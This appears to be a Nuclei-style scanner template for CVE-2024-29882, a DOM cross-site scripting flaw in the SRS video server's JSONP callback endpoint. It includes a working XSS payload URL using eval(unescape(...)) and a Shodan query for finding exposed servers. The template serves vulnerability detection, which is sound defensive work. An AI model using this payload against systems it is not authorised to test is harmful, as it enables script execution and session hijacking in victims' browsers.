id: CVE-2024-29882

info:
  name: HTTP API DOM - XSS on JSONP callback
  author: rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    SRS is a simple, high-efficiency, real-time video server. SRS's `/api/v1/vhosts/vid-?callback=` endpoint did not filter the callback function name, which allowed injection of malicious JavaScript payloads and execution of XSS (Cross-Site Scripting). This vulnerability is fixed in 5.0.210 and 6.0.121.
  remediation: |
    Upgrade Simple Realtime Server (SRS) to version 5.0.210, 6.0.121, or later, which properly sanitizes the JSONP callback parameter.
  impact: |
    Attackers can execute arbitrary JavaScript in the context of the victim's browser, potentially leading to session hijacking or defacement.
  reference:
    - https://github.com/ossrs/srs/commit/244ce7bc013a0b805274a65132a2980680ba6b9d
    - https://github.com/ossrs/srs/security/advisories/GHSA-gv9r-qcjc-5hj7
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2024-29882
    cwe-id: CWE-79
    epss-score: 0.01086
    epss-percentile: 0.60905
  metadata:
    verified: true
    max-request: 1
    vendor: ossrs
    product: simple_realtime_server
    shodan-query: http.favicon.hash:1386054408
  tags: cve,cve2024,srs,dom,xss,vuln

headless:
  - steps:
      - args:
          url: '{{BaseURL}}/console/en_index.html?alert(document.domain)#/vhosts/vid-xsedfv%3Fcallback=eval(unescape(location.search.slice(1)))%252f%252f'
        action: navigate
      - action: waitdialog
        name: object_dom

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - object_dom == true

      - type: word
        part: body
        words:
          - "SRS"
          - "ConnectSRS</a>"
        condition: or
        case-insensitive: true
# digest: 4a0a0047304502207215647ea4e0007886948761294c047eb2ca2360f0ef92fb717199af9fe89d6e022100a65e1e65ee36cc36bba682994959fa0283f6ae091a1ec40d5d81f1e4bf532bc6:922c64590222798bb761d5b6d8e72950